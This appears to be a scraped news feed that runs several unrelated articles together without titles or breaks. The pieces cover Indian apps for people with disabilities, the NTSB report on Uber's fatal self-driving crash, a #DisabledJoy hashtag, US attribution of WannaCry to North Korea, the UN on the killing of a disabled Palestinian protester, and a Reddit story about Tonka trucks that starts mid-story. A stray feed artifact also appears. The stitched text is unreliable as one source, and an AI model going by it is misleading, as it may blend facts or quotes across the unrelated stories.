Shweta Mahavar was 25 when her parents first took out a newspaper advertisement to find her a groom. Wheelchair-bound since she was stricken with polio as a child, Mahavar knew finding love wouldn’t be easy, but she hadn’t anticipated the magnitude of her challenge. The men and their families that did respond shared an agenda — to extract a hefty dowry, citing her disability. Mahavar decided she wouldn’t marry, and for more than a decade buried her dreams of a life with a caring partner. Then, last year, she met Alok Kumar through Inclov, a matchmaking app for persons with disabilities in India. The couple got married on July 21, and Mahavar now has the love she had once given up on.

For generations, India’s vast population of people with disabilities, 26.8 million strong according to the country’s 2011 census, has struggled with discrimination in society, education, employment and marriage. India’s disability rights movement, born in the 1970s, has fought and won key legal battles. The Rights of Persons with Disabilities Act of 2016 criminalizes discrimination against the community. But activists say laws alone do little to make everyday life easier for those with disabilities, who remain an invisible minority in a country notoriously lacking in access to public transport and spaces.
Now, a wave of tech-driven initiatives is promising to do what laws cannot, holding out examples for the West. Launched in 2017, BillionAbles, India’s first lifestyle app for the community, is building a consolidated database to make it easier to find disabled-friendly restaurants, tourist locations and other public places across India. In a year, the app has had 15,000 unique visitors, and listed more than 1,000 disabled-friendly venues across the country.
It has given him a voice.
Vandana Gautam, who uses Avaz, a language development app, for her son who suffers from limited speech
Avaz, a language development mobile app launched in 2012, helps children with speech disorders communicate, and is now being used by at least 197 government-run schools for children with speech impediments and learning disabilities in the Indian state of Tamil Nadu. And Inclov has, since its 2016 launch, brought together 12,000 couples, and has 35,000 subscribers across the country, including Mahavar and Kumar.
“When I look at her, I see no disability,” says Kumar, who doesn’t suffer from any disability. “I just see a beautiful person who makes me happy.”
The mountain these apps are trying to climb is steep. According to a U.N. report, 42 percent of Indians with disabilities never marry. They remain victims of prejudice and, as in Mahavar’s case, vulnerable targets to exploit. Some families who responded to the advertisement asked for cash, property or vehicles to “take care of the dependent woman,” while others asked for businesses to be set up for their sons, or homes to be bought for the couple. “They were all there to make money off my disability, barter their sons for cash,” recalls Mahavar, now 38 and residing in Sitapur town in northern India’s Uttar Pradesh state.
The struggle to access public spaces is just as severe. India’s Supreme Court noted last December that only in seven of the country’s 27 states are half or more government buildings accessible to people with disabilities. And despite legal protections against discrimination, and statutory affirmative action, people with disabilities battle stereotypes at the workplace and in education. “The general perception toward the disabled population in India is that they are not entirely competent,” says Mahantesh Kivadasannavar, founder of Samarthanam Trust for the Disabled, a Bangalore-based nongovernmental organization.
Nevertheless, these apps are already making a dent — so much so that they’re beginning to gain traction in the West, and are hatching overseas expansion plans. Inclov, for example, is the world’s first matchmaking platform on its scale for people with disabilities. While dating clubs for people with disabilities in the West are usually fragmented and neighborhood-specific, Inclov is national in its reach, says Kalyani Khona, co-founder and CEO of the firm. And it straddles the virtual and physical matchmaking space. Through a project called Social Spaces, Inclov has already arranged nearly 50 meetups for those with disabilities in 14 Indian cities. Inclov is in the process of raising funds, and by next year hopes to be available in the U.K. and Australia too, says Khona.

Sameer Garg, disabled by a spinal cord injury two decades ago, noticed there was no centralized online platform in India identifying public spaces friendly to those with disabilities. People needed to rely on referrals, personal inquiries or search engines. So last year, Garg and his wife launched BillionAbles. “Although there are such platforms abroad, we noticed there was a gap in India,” says Garg, 44. The app and website depend on people with disabilities to mark spaces they’ve visited that are accessible. Then, the BillionAbles team authenticates the public spaces after visiting them. Already, the team has validated at least 400 places. Shishir Bhatnagar, a 36-year-old with a locomotive disability, uses BillionAbles when he has to leave home, though he points to the need for categorization of public spaces as friendly to people with specific disabilities. “If a person with a visual disability marks a space accessible, it may be good for Braille users, but might not necessarily have ramps for wheelchairs,” says Bhatnagar.
The Avaz app, says founder Ajit Narayanan, has been downloaded more than 50,000 times, and the platform is being used by schools and NGOs all over the world, from China to Denmark and Sri Lanka to Sweden. Its price is a major driver of its success. When Narayanan, an engineer, first explored the possibility of such a learning aid device in 2007, he found most Western versions cost $ 10,000 and up. With a small grant from India’s Ministry of Science and Technology, he developed one for $ 600 and, two years later, launched an app.
Vandana Gautam, 40, uses the app, which deploys pictures to relate words and concepts, for her 10-year-old son, Saksham, who has limited speech. Earlier, when she would teach him, she “couldn’t completely tell if he was able to grasp what I was saying,” Gautam says. The app lets Saksham choose from multiple emotions shown through images on the screen. When he clicks on one, the app speaks out what he’s feeling. “With the app, my son can tell me if he’s understood. It has given him a voice,” says Gautam.
There’s still a need to widen awareness about these platforms, says Isha Mehta, communications manager at Mumbai-based NGO the Muskan Foundation. And these apps aren’t going to erode stereotypes, as Mahavar and Kumar know only too well. Kumar, 34, stumbled upon Inclov while researching for his YouTube channel about marriage prospects for persons with disabilities, met Mahavar and fell in love. But his family is unwilling to accept their marriage because of Mahavar’s disability, and has refused to let the couple live with them.
Still, technology has done what newspaper advertisements couldn’t. Mahavar knows her struggle for full social acceptance continues, but she has Kumar by her side.

The National Transportation Safety Board has released its preliminary report on the fatal March crash of an Uber self-driving car in Tempe, Arizona. It paints a damning picture of Uber’s self-driving technology.
The report confirms that the sensors on the vehicle worked as expected, spotting pedestrian Elaine Herzberg about six seconds prior to impact, which should have given it enough time to stop given the car’s 43mph speed.
The problem was that Uber’s software became confused, according to the NTSB. “As the vehicle and pedestrian paths converged, the self-driving system software classified the pedestrian as an unknown object, as a vehicle, and then as a bicycle with varying expectations of future travel path,” the report says.

On Sunday, writer Andrew Farkash took to Twitter to tackle a flawed thinking many people have regarding those with disabilities.
Along with four pictures by photographer Myai Jackson, Farkash wrote, “There’s a common misconception that you can’t be Disabled and happy. That you can’t express joy, and if you do, you must not be hurting or Disabled anymore. I propose a new hashtag to empower us and show people otherwise: #DisabledJoy.” See the rest of the story at Business Insider

(Reuters) — Facebook Inc and Microsoft Corp disabled a number of North Korean cyber threats last week, a White House official said on Tuesday, as the United States publicly blamed Pyongyang for a May cyber attack that crippled hospitals, banks and other companies.
“Facebook took down accounts that stopped the operational execution of ongoing cyber attacks and Microsoft acted to patch existing attacks, not just the WannaCry attack initially,” White House homeland security adviser Tom Bossert said on Tuesday.
Bossert did not provide details on the actions by the two American tech heavyweights but said the U.S. government was calling on other companies to cooperate in cyber security defense.
Bossert’s remarks came during a White House news conference in which he blamed Pyongyang for the WannaCry attack that infected hundreds of thousands of computers in more than 150 countries, saying the U.S. government had clear evidence that North Korea was responsible. He did not share that evidence.
The U.S. accusation came at a time of high tension with North Korea over its nuclear weapons and missile programs.
A Facebook spokesman confirmed that the company last week deleted accounts associated with a North Korea-linked hacking entity known as Lazarus Group “to make it harder for them to conduct their activities.” The accounts were mostly personal profiles operated as fake accounts that were used to build relationships with potential targets, the spokesman said.
Facebook said it also notified individuals in contact with these accounts.
The actions echoed similar steps the social media powerhouse took this year against suspected Russian accounts that Facebook said were used to promote divisive political messages during the 2016 U.S. presidential election.
In a blog post, Microsoft President Brad Smith said the company last week disrupted malware that the Lazarus Group relied upon, cleaned customers’ infected computers and “disabled accounts being used to pursue cyber attacks.” Smith said the steps were taken after consultation with several governments, which he did not identify, but Microsoft’s decision was independent.
The WannaCry attack was “meant to cause havoc and destruction,” Bossert said. He conceded there was little the United States could do to exert further pressure on Pyongyang.
“We don’t have a lot of room left here to apply pressure to change their behavior,” Bossert said. “It’s nevertheless important to call them out, to let them know that it’s them and we know it’s them.”
Britain and several private sector security researchers previously concluded that North Korea was responsible for the attack. Bossert said other countries including Japan, Australia, New Zealand and Canada also agreed with the U.S. conclusion.
A senior administration official told Reuters on Monday that U.S. intelligence agencies had a “very high level of confidence” that the Lazarus Group carried out the WannaCry attack. Classified sources and methods were used to make that determination, the official said.
Lazarus is widely believed by security researchers and U.S. officials to have been responsible for the 2014 hack of Sony Pictures Entertainment that destroyed files, leaked corporate communications online and led to the departure of several top executives.
North Korean government representatives could not be reached immediately for comment. Pyongyang has denied responsibility for WannaCry and called other allegations that it launched cyber attacks a smear campaign.
The United States did not issue any indictments or name individuals believed to be involved in the attacks.
Worries are mounting in Washington about North Korea’s hacking capabilities and its weapons programs. North Korea this month said it had successfully tested an intercontinental ballistic missile that could place the entire U.S. mainland within range of its nuclear weapons.
Considered unprecedented in scale at the time, the WannaCry attack knocked British hospitals offline, forcing thousands of patients to reschedule appointments, and disrupted infrastructure and businesses around the world.
The attack was defanged when Marcus Hutchins, a British cyber security researcher, detected a so-called kill switch within WannaCry’s code. Hutchins was arrested in Las Vegas by U.S. law enforcement in August on unrelated charges that he had built and sold malicious code used to steal banking credentials, for which he has pleaded not guilty. He remains in the United States awaiting court proceedings.
Bossert declined to comment about the Hutchins case, but said “we got lucky” that the WannaCry attack was not more damaging.
“We also had a programmer that was sophisticated who noticed a glitch in the malware,” Bossert said. “We’ll give him that. Next time we won’t get so lucky.”
WannaCry was made possible by a flaw in Microsoft’s Windows software, which was discovered by the U.S. National Security Agency and then used by the NSA to build a hacking tool for its own use.
In a devastating NSA security breach, that hacking tool and others were published online by the Shadow Brokers, a mysterious group that regularly posts cryptic taunts toward the U.S. government. The tool was then used in the WannaCry attack.
]]>“The facts gathered so far by my staff in Gaza strongly suggest that the force used against Ibrahim Abu Thurayeh was excessive,” the UN High Commissioner for Human Rights, Zeid Ra’ad Al Hussein, said Tuesday.
At least four Palestinians were killed and more than 150 injured, as thousands took to the streets of the West Bank, Gaza and Jerusalem last Friday. Among those killed was 29-year-old Thurayeh, a disabled activist confined to a wheelchair after losing both of his legs, allegedly, in the Israeli attack on Gaza in 2008.
Social media was flooded with videos and photos of Thurayeh a few hours before his death – sitting in his wheelchair and waving a Palestinian flag. “This land is our land, we will not give up. America has to withdraw its decision,” he reportedly said in a video seen by AFP.
Hours later, Thurayeh was shot and killed by Israeli forces during clashes in Anata, a village just outside Jerusalem, where the IDF fired live ammunition and rubber bullets against the Palestinians. The UN human rights chief condemned the mass and brutal crackdown by Israeli forces, describing Thurayeh’s killing as a “shocking and wanton act.”
“There is nothing whatsoever to suggest that Ibrahim Abu Thurayeh was posing an imminent threat of death or serious injury when he was killed. Given his severe disability, which must have been clearly visible to those who shot him, his killing is incomprehensible – a truly shocking and wanton act,” Hussein said.
He maintains the IDF acted against international human rights law which strictly regulates the use of force against demonstrators. “The lethal use of firearms should only be employed as the last resort, when strictly unavoidable, in order to protect life,” Hussein pointed out.
Following the deadly clashes Friday, the Israeli military said that “during the violent riots IDF soldiers fired selectively towards main instigators,” after rioters threw firebombs, rocks and rolled burning tires at soldiers and border police.
Following the backlash over the death of the 29-year-old disabled Palestinian, the Israeli army announced Sunday that it was launching an investigation into the case. In a swift review, the IDF said Monday its soldiers did not intentionally fire at Thurayeh. “No live fire was aimed at Abu Thurayeh. It is impossible to determine whether Abu Thurayeh was injured as a result of riot dispersal means or what caused his death.”
At least five people have been killed so far and over a thousand injured as Israel continue to fire live munitions, rubber bullets and other dispersal weapons to crack down on Palestinians following Trump’s December 6 declaration which spurred mass unrest, the UN said Tuesday. Palestine’s Maan news agency, however, estimates that at least 10 Palestinians were killed in the two weeks of ongoing clashes after Hamas urged a new intifada to liberate Jerusalem. The use of live ammunition has resulted in over 220 people being injured in Gaza, including 95 on Friday alone, according to UN figures.
“This level of casualties raises serious concerns as to whether the force used by Israeli forces was properly calibrated to the threat,” Hussein said. He urged Israel to “immediately open an independent and impartial investigation into this” and other deadly incidents. “And these events, including the loss of five irreplaceable human lives, can sadly be traced directly back to the unilateral US announcement on the status of Jerusalem, which breaks international consensus and was dangerously provocative.”

Her brother, who is also visually impaired and spends most of his time in a wheelchair, the truck’s bright colors and structure is “pretty much the holy grail for a visually impaired kid who can crawl behind it without it going into the other room.”
Other models with rubber tires frustrate him, she added because they come off immediately. He also notices if its signature metal hook is missing.
The 25-year-old plays with the trucks every day for hours, his sister said, literally running them into the ground.
Touched and determined, Reddit users swarmed the comment section asking if other models “were close enough.”
“Although I don’t have that Adventure model, I do have the police model that I’d be happy to send you to share with your brother this Xmas. From what you say, I don’t think that this is going to fit the bill though. Here is a photo of what it looks like. Let me know!” someone wrote.
“I found one on Ebay and bought it. It’s this one. I’ll PM so I can send it to you when it arrives. Ebay says I should have it by the 6th. You’ll have it soon after that. Yep, I know blue is preferred, but I’m hoping this one will work. I couldn’t find a blue one,” another user said.
“Here’s one posted on Ebay France. If you need help ordering, my boyfriend lives in Le Mans, France and has been helpful with this sort of thing before. However, according to the post, the item is located in US! I can ask him to contact the seller if there’s a language barrier! Good luck OP, and Happy Holidays!”
Tonka told BuzzFeed News “a massive outpouring of people” sent emails and private messages.
“People were even looking for employees through LinkedIn and contacting their private emails,” Jessica Gonzalez, a spokeswoman with Funrise Toy Corp., which owns Tonka, said Wednesday. “As soon as we received the first email, no one at this office batted an eye and we began searching for the toy immediately. We actually get a few stories like this sent to us every year and we always send toys to help however we can, but we’ve never been contacted like this through a viral post.”
“This one is tough because it’s such an old toy, we have to do extra digging,” Gonzalez added, however, the company got their “address and we plan on sending her as many of those hummer trucks we can find as well as some additional Tonka trucks. Since he has special requests like, no rubber wheels, action levers, and a need for bright colors (he’s legally blind), we plan on making some custom adjustments to some other vehicles in hopes that he’ll like those as well.”
“My brother is about the same! He is 27 but has regressed to the point where he is in diapers and has no means of verbal communication. A few years ago, McDonald’s had these Beanie Babies they packed in their kids meal, and for some reason my brother got ahold of one that was a monkey and he has always kept it in his hands ever since. For years, my dad would go on eBay just to find the exact same one (since it was specifically the Happy Meal toy, and not an actual Beanie Baby) so that any time my brother loses his Beanie Baby monkey, we have one to immediately replace it with. Sometimes it gets stressful, because his tantrums have really decreased after he found his Beanie Baby monkey, so when he misplaces it, we’re all searching for a replacement to calm him down.
My brother will never know that the 1 Beanie Baby monkey he has is actually hundreds (by this time) of different Beanie Baby monkeys that look exactly alike.
Good luck with the trucks! True love lives on!”
“As someone who is a guardian of a man with Down Syndrome, I’m half laughing and half crying because I know your frustration, and I can totally empathize with you. The hoops you jump through to get everything ‘just right!’,” someone shared.
“My oldest son has autism and I felt the exact same way. We’ve custom printed posters and shirts, built toys, searched the internet for hours for insane products we know don’t actually exist,” another user said.
“We have at least one red one hidden in a closet for back up so we never miss a gift,” Gretschel continued. “It’s like an all year mission, but we haven’t failed him yet.”
“People expect me to treat him differently but it’s just like having a little brother who never grew up,” she said. “I still treat him like my annoying little brother, but I never want to let him down.”
Immigration Minister Ahmed Hussen says the government is committed to ditching a policy that rejects immigrants because they’re sick or disabled and could be a drag on the health system.
